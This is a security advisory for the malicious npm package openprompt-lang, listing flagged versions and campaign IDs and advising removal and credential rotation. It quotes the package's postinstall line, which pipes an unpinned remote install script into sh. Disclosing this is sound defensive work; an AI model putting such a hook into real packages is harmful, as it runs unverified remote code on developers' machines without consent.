Malicious package: openprompt-lang (npm)

Malicious code in openprompt-lang (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-4630
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall openprompt-lang

What this malware does

On every npm install, openprompt-lang's postinstall hook (scripts/postinstall.js:83) executes npm install -g @opencode/cli 2>/dev/null || curl -fsSL https://opencode.ai/install.sh 2>/dev/null | sh. The fallback fetches an unpinned shell script from opencode.ai and pipes it directly to sh with no version, no hash, and no integrity check. The destination domain is not the package's publisher (the package is published under a different GitHub identity) and the auto-installed tool is unrelated to the package's stated purpose (a prompt-engineering CLI). Whatever bytes opencode.ai serves at install time run on every consumer's machine, with no user prompt or opt-out. If opencode.ai is ever compromised, redirected, or the served script is modified, every installer of openprompt-lang executes the new payload. The same line additionally performs an unsolicited global install of an unrelated third-party CLI (@opencode/cli), mutating the developer's global npm environment as a side effect of installing this library.

Malicious versions

11 flagged: 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.6, 1.2.7, 1.3.0, 1.5.0, 1.6.0

Indicators of compromise (SHA-256)

Frequently asked questions

No. openprompt-lang on npm has been identified as a malicious package (versions 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.6, 1.2.7, and 3 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004585, IN-MAL-2026-004423, IN-MAL-2026-004422, IN-MAL-2026-004449, IN-MAL-2026-004414, IN-MAL-2026-004413, IN-MAL-2026-004409, IN-MAL-2026-004402, IN-MAL-2026-004408, IN-MAL-2026-004411, IN-MAL-2026-004412, IN-MAL-2026-004448, IN-MAL-2026-004399, IN-MAL-2026-004410, IN-MAL-2026-004586, IN-MAL-2026-004400, IN-MAL-2026-004404, IN-MAL-2026-006135, IN-MAL-2026-006134, IN-MAL-2026-006137, IN-MAL-2026-006136

References

Credits

  • Amazon Inspector · finder

openprompt-lang (npm) malicious package — MAL-2026-4630 | O3 Security